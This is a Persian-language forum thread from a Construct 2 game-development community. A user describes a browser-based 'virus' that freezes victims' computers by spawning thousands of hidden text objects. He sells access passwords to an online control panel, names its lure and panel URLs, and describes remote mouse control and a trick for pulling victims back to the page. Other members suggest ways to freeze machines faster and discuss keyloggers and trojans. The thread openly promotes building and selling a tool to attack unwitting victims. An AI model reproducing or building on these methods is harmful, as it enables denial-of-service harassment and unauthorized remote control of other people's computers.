کار های عجیبی که با کانستراکت 2 انجام دادید !
ویروسی که میگی چی هست کارش دقیقا ؟
و درآمدت رو میشه بگی ؟ ( خواهش 1 )
! KEEP CALM AND LOVE CONSTRUCT 2 
آرام باش و به کانستراکت 2 عشق بورز !
  پاسخ

سپاس شده توسط:
خوب این ویروس یه قسمتیش رو از یکی از آموزش های آقا مجتبی فهمیدم. تو قسمت تازه کاران یه آموزش بود که یه رفتاری رو به به شی میداد برای اینکه از لایوت خارج بشه حذف بشه.
خوب دلیلشون رو هم گفتن.
بر طبق اون دلیل من اومدم یه لایه جدید ایجاد کردم و اون لایه رو invisible کردم. و باید این رو هم بگم که اگر ما مثلا یک global variable ایجاد کنیم و به جای اینکه بگیم every tick بگیم که مثلا global variable فلان ۰ بود این اتفاق بیفته > سرعت بیشتر خواهد بود تا این که every tick  بزاریم. بعد من همین کار رو کردم و بعد گفتم که اگر ۰ بود در اون لایه ای که invisible کردم یسری تکست با فونت سایز بالا ایجاد بشه. خوب بعدش گفتم اگر تعداد اون تکست ها از ۱۰۰۰ بیشتر شد. اون لایه visible بشه!!!!!!!!

خوب اگر خودتون امتحان کنید ( که توصیه میکنم امتحان نکنید 1 ) میبینید سیستمتون به طور عجیبی هنگ میکنه. انقد هنگ میکنه که شاید شاید مجبور به رستارت کردن سیستم بشین. حالا سیستم من که خودش کلا داغونه امتحان کردم اصلا مجبور شدم رستارت کنم.

خب در رابطه با درآمد هم باید بگم که کسی که میخواد از طریق این پنل بصورت آنلاین قربانی رو عملیات رو روش انجام بده باید یه رمزی رو در پنل وارد کنه و اون رمز رو باید از بنده خریداری کنه.
1

امکانات رو هم انشالله بقیش رو هم همین زودیا توضیح میدم. فعلا که همین یکیش انقد طول کشید  13

این پست بزودی حذف میشه 1

این سوالی هم که من از دوستان در انجمن برای تغییر مکان موس پرسیدم برای این بود که بتونیم سیستم طرف رو از طریق پنل ریموت کنیم ( کنترلش کنیم) یعنی مثلا هر ۱ ثانیه مکان موس خودمون رو برای طرف بفرسته و مکان موس اون بشه مکان موس ما و یه جوری انگار داریم کنترلش میکنیم.
که خوشبختانه مدیر عزیز vng یک پلاگین قرار داده اند. که با اینکه جای تشکر فراوان داره ولی نمیشه مکان موس رو تغییر داد. ولی امکانات خیلی جالبی هم داره که من از ایشون ممنونم
telegram id : @firebug2017
4
  پاسخ

سپاس شده توسط: Vizmark# ، mehdi70 ، kaveh_pzh ، amirreza
(1394/5/21، 12:43 صبح)majid tarh نوشته است: خوب این ویروس یه قسمتیش رو از یکی از آموزش های آقا مجتبی فهمیدم. تو قسمت تازه کاران یه آموزش بود که یه رفتاری رو به به شی میداد برای اینکه از لایوت خارج بشه حذف بشه.
خوب دلیلشون رو هم گفتن.
بر طبق اون دلیل من اومدم یه لایه جدید ایجاد کردم و اون لایه رو invisible کردم. و باید این رو هم بگم که اگر ما مثلا یک global variable ایجاد کنیم و به جای اینکه بگیم every tick بگیم که مثلا global variable فلان ۰ بود این اتفاق بیفته > سرعت بیشتر خواهد بود تا این که every tick  بزاریم. بعد من همین کار رو کردم و بعد گفتم که اگر ۰ بود در اون لایه ای که invisible کردم یسری تکست با فونت سایز بالا ایجاد بشه. خوب بعدش گفتم اگر تعداد اون تکست ها از ۱۰۰۰ بیشتر شد. اون لایه visible بشه!!!!!!!!

خوب اگر خودتون امتحان کنید ( که توصیه میکنم امتحان نکنید 1 ) میبینید سیستمتون به طور عجیبی هنگ میکنه. انقد هنگ میکنه که شاید شاید مجبور به رستارت کردن سیستم بشین. حالا سیستم من که خودش کلا داغونه امتحان کردم اصلا مجبور شدم رستارت کنم.

خب در رابطه با درآمد هم باید بگم که کسی که میخواد از طریق این پنل بصورت آنلاین قربانی رو عملیات رو روش انجام بده باید یه رمزی رو در پنل وارد کنه و اون رمز رو باید از بنده خریداری کنه.
1

امکانات رو هم انشالله بقیش رو هم همین زودیا توضیح میدم. فعلا که همین یکیش انقد طول کشید  13

این پست بزودی حذف میشه 1

این سوالی هم که من از دوستان در انجمن برای تغییر مکان موس پرسیدم برای این بود که بتونیم سیستم طرف رو از طریق پنل ریموت کنیم ( کنترلش کنیم) یعنی مثلا هر ۱ ثانیه مکان موس خودمون رو برای طرف بفرسته و مکان موس اون بشه مکان موس ما و یه جوری انگار داریم کنترلش میکنیم.
که خوشبختانه مدیر عزیز vng یک پلاگین قرار داده اند. که با اینکه جای تشکر فراوان داره ولی نمیشه مکان موس رو تغییر داد. ولی امکانات خیلی جالبی هم داره که من از ایشون ممنونم

فقط میتونم بگم هنر نزد ایرانیان است و بس   4

فکر کنم برای اولین باره توی جهان که با انجین بازی سازی ویروس میسازن  24

راستی چطوری واسه ویروست مشتری جور میکنی؟ درآمدت به 100 تومن رسیده؟

....................................

کلا با c2 ساخته شده یا خودتم توش کدنویسی انجام دادی؟

پسوردشو رندوم میزنه یا توی دیتابیسه؟  4

یکم بیشتر توضیح بده که مثلا موقعی که پسورد میزنی چی میشه؟ باید آدرس صفحه html رو بدی به قربانی تا توی مرورگرش اجرا بشه و سیستمش هنگ کنه یا کپی میشه توی سیستم و استارت آپ؟

کانستراکت ریموت کنترل هم داره مگه؟   39
  پاسخ

سپاس شده توسط: majid tarh ، kaveh_pzh ، amirreza ، shaygaaan
سلام
تبریک شما خودتونو کلا با کانستراکت وفق دادید.ما دنبال راهی می گردیم که پرفرمنس بازیمون بالا بره ولی شما از این خاصیت سنگین بودن اون داری بهره می بری.
اگه یه شیء که رفتار فیزیک داره ایجاد بشه زودتر کامپیوتر هنگ می کنه.
آخه فیزیک کانستراکت رم و سی پی یو را قورت میده.
مخصوصا اگه بگی هر لحظه اونا به هم جوینت بشند.
راستی اگه افکت هم بدید و opasity لایه را کم کنید بهتر.

امیدوارم سیستمتون منفجر نشه 63
  پاسخ

سپاس شده توسط: Vizmark# ، majid tarh ، amirreza ، amireza
(1394/5/21، 11:02 صبح)mehdi70 نوشته است:
(1394/5/21، 12:43 صبح)majid tarh نوشته است: خوب این ویروس یه قسمتیش رو از یکی از آموزش های آقا مجتبی فهمیدم. تو قسمت تازه کاران یه آموزش بود که یه رفتاری رو به به شی میداد برای اینکه از لایوت خارج بشه حذف بشه.
خوب دلیلشون رو هم گفتن.

1

این پست بزودی حذف میشه 1

فقط میتونم بگم هنر نزد ایرانیان است و بس   4

فکر کنم برای اولین باره توی جهان که با انجین بازی سازی ویروس میسازن  24

راستی چطوری واسه ویروست مشتری جور میکنی؟ درآمدت به 100 تومن رسیده؟

....................................

کلا با c2 ساخته شده یا خودتم توش کدنویسی انجام دادی؟

پسوردشو رندوم میزنه یا توی دیتابیسه؟  4

یکم بیشتر توضیح بده که مثلا موقعی که پسورد میزنی چی میشه؟ باید آدرس صفحه html رو بدی به قربانی تا توی مرورگرش اجرا بشه و سیستمش هنگ کنه یا کپی میشه توی سیستم و استارت آپ؟

کانستراکت ریموت کنترل هم داره مگه؟   39

سلام دوست عزیز 1

در رابطه با ریموت کنترل باید بگم که اون پلاگینی که آقای vng قرار دادن که مکان موس رو تغییر میده استفاده کردم. که وقتی کسی که تو پنل هست خواست از این امکان استفاده کنه یه عکس از سیستم قربانی به اون کسی که تو پنله میرسه و اونجا در صفحه به نمایش در می آد. دیگه هر یک ثانیه مکان موس اون تغییر میکنه به مکان موس کسی که تو پنل است. چونکه تو اون هر یک ثانیه یک پیغام فرستاده میشه به قربانی که message اون همون مکان موس است. خوب تا اینجا پیش رفتیم ولی هنوز پیدا نکردیم که چطوری شبیه سازی کلیک موس رو بکنیم. یعنی اگر کسی که تو پنل هست کلیک کنه پیغام ارسال بشه که مثلا کلیک شده و هروقت قربانی این پیغام رو دریافت کرد اونم کلیک کنه.
___________________________________________________________________________________________

در رابطه با اینکه چطوری کسی که تو پنله مثلا میتونه قربانی رو ویروسی کنه باید بگم که ...

این آدرس رو بهش میگیم تله ! جایی که قربانی رو تشویق به اومدن به اینجا میکنیم : firebughack.zgig.ir

و این قسمت هم پنل هست : firebughack.zgig.ir/panell

خوب قربانی به قسمت تله میره. و همیشه یک صفحه هست که همیشه یک نوشته (لطفا صبر کنید ... ) رو داره تا قربانی بیشتر صبر کنه و فکر کنه الان داره لود میشه یا چیزی.
خوب مشکلی که ما قبلا داشتیم این بود وقتی قربانی از قسمت تله بیرون میرفت (خارج نمیشد فقط میرفت تو یه صفحه دیکه یا مرورگرش رو minimize میکرد) دیگه پیغام های دستوری ما رو تا موقعی که نمیومد تو پنل دریافت نمیکرد. برا همین این دستور رو گذاشتم که هروقت پیغام دستوری دریافت شد مرورگر یه پیغام خالی بده تا مرورگر برای نشان دادن اون پیغام قربانی رو به مرورگر و همون صفحه بکشونه.
و بعد پیغام دستوری هم بعدش ارسال میشد 1

در رابطه با در آمد هفته ای 60 تومن رو شاید سود کنم.
و در رابطه با پسورد باید بگم که این پسورد به صورت رندوم است. یک قسمت دیگه ساختم که هروقت به اون قسمت رفتم پنل رمز رو به اون قسمت برای من بفرسته. اون قسمت رو هم هیچکس ازش خبر نداره 4

(1394/5/21، 11:34 صبح)ghasem نوشته است: سلام
تبریک شما خودتونو کلا با کانستراکت وفق دادید.ما دنبال راهی می گردیم که پرفرمنس بازیمون بالا بره ولی شما از این خاصیت سنگین بودن اون داری بهره می بری.
اگه یه شیء که رفتار فیزیک داره ایجاد بشه زودتر کامپیوتر هنگ می کنه.
آخه فیزیک کانستراکت رم و سی پی یو را قورت میده.
مخصوصا اگه بگی هر لحظه اونا به هم جوینت بشند.
راستی اگه افکت هم بدید و opasity لایه را کم کنید بهتر.

امیدوارم سیستمتون منفجر نشه 63

سلام خیلی خیلی خیلی ممنونم از این پیشنهاد خیلی خوبتون. حتما همین کار رو تست میکنم. امید وارم ایندفعه سیستمم منفجر نشه 4 41
4
  پاسخ

سپاس شده توسط: mehdi70 ، Vizmark# ، kaveh_pzh ، amirreza
سوالی که برام پیش اومده اینه که کلا سیستمش با کانستراکت بوده و همچنین سیستم پسورد؟ یا خودت کدشو جداگانه نوشتی؟

این ویروس با همون پلاگین ساخته شده؟

واقعا برام جالبه مردم مگه برای همچین چیزی پول هم میدن؟ مثلا طرف بیاد 5 تومن بده پسورد بخره که با آدرس این وب بتونه فقط کامپیوتر طرفو هنگ کنه یا نهایت کنترل موس رو در دست بگیره بعد اگر ارتباط طرف با اینترنت قطع بشه و صفحه رو ببنده و دوباره وصل بشه دیگه اثری از ویروس نیست

این ویروس چه جذابیتی داره برای مشتری؟

روی مرورگر موبایل هم کار میکنه؟(این مورد میتونه جذابیت فوق العاده ای داشته باشه)

به نظرم بدرد آزار و اذیت نمیخوره و بجاش میشه ازش استفاده های زیادی کرد مثلا به عنوان یه کیلاگر اگه بشه ازش استفاده کرد اون موقع خیلی خفن میشه
  پاسخ

سپاس شده توسط: majid tarh ، amirreza
(1394/5/21، 01:38 عصر)mehdi70 نوشته است: سوالی که برام پیش اومده اینه که کلا سیستمش با کانستراکت بوده و همچنین سیستم پسورد؟ یا خودت کدشو جداگانه نوشتی؟

این ویروس با همون پلاگین ساخته شده؟

واقعا برام جالبه مردم مگه برای همچین چیزی پول هم میدن؟ مثلا طرف بیاد 5 تومن بده پسورد بخره که با آدرس این وب بتونه فقط کامپیوتر طرفو هنگ کنه یا نهایت کنترل موس رو در دست بگیره بعد اگر ارتباط طرف با اینترنت قطع بشه و صفحه رو ببنده و دوباره وصل بشه دیگه اثری از ویروس نیست

این ویروس چه جذابیتی داره برای مشتری؟

روی مرورگر موبایل هم کار میکنه؟(این مورد میتونه جذابیت فوق العاده ای داشته باشه)

به نظرم بدرد آزار و اذیت نمیخوره و بجاش میشه ازش استفاده های زیادی کرد مثلا به عنوان یه کیلاگر اگه بشه ازش استفاده کرد اون موقع خیلی خفن میشه

ســـلـــام دوست عزیز. نه هیچ کدی به کار نرفته. و در ضمن باید بگم یکی دو امکان نیست امکانات بیشتری داره.

راستش اول نمیخواستم این پنل رو فروشی بزارم

به یکی از دوستان دادم فرداش اونطوری که اون تعریف میکرد و خوشش اومد خیلی تعجب کردم ( با اینکه نسخه اول پنل بود و خیلی ساده بود) بعدش به چند نفر دیگه هم که دادم دیدم نظرشون همین بود.
به ذهنم زد که بیام پولی کنم.
بعد که پولی کردم فک نمیکردم کسی بخره ولی با این حال مشتری داشت 1
مشتری هم بعد از خرید کاملا راضی بود 1
و در مورد گوشی که باید بگم اصلا نباید تست کنید( ممکنه آسیب بزنه) البته نمیدونم ولی فک کنم خیلی هنگ کنه و با بقیه امکانات یعنی دانلود مستقیم پنل شاید خیلی آسیب بزنه !

و با تشکر از شما برای نظر مفیدتون 1

در مورد کیلایگر باید بگم کنستراکت کلاسیک واقعا یه برنامه فوقلعاده است.
از ابزار های windows و ... استفاده های خیلی جالبی میشه کرد.
خیلی راحت میتونید یه برنامه فوقلعاده بسازی باهاش. خیلی خوبه. هردوشون خوبن هم کنستراکت 2 و هم کنستراکت کلاسیک که به نظر خودم برا ساخت کیلاگر و تروجان کنستراکت کلاسیک بهترین گزینه است ( البته برا من 1 )
4
  پاسخ

سپاس شده توسط: amirreza ، mehdi70
عزیزم نیاز نبود خودتو خسته کنی با یه خط کد جاوا اسکریپت میشد همین کارو کرد البته کانستراکت رو cpu فشار میاره بهش نمیشه گفت ویروس چون همچی دست کاربره .. و میتونه دفعات بعد اون صفحه رو باز نکنه..
من باور نمیکنم کسی خریده باشه.. 
  پاسخ

سپاس شده توسط:
آفرین باحاله :دی
[تصویر:  Capture.PNG_559716.png]
  پاسخ

سپاس شده توسط:
دوست عزیز ممکنه یه پسورد تستی بدی ؟
  پاسخ

سپاس شده توسط:

موضوع‌های مشابه…
موضوع نویسنده پاسخ بازدید آخرین ارسال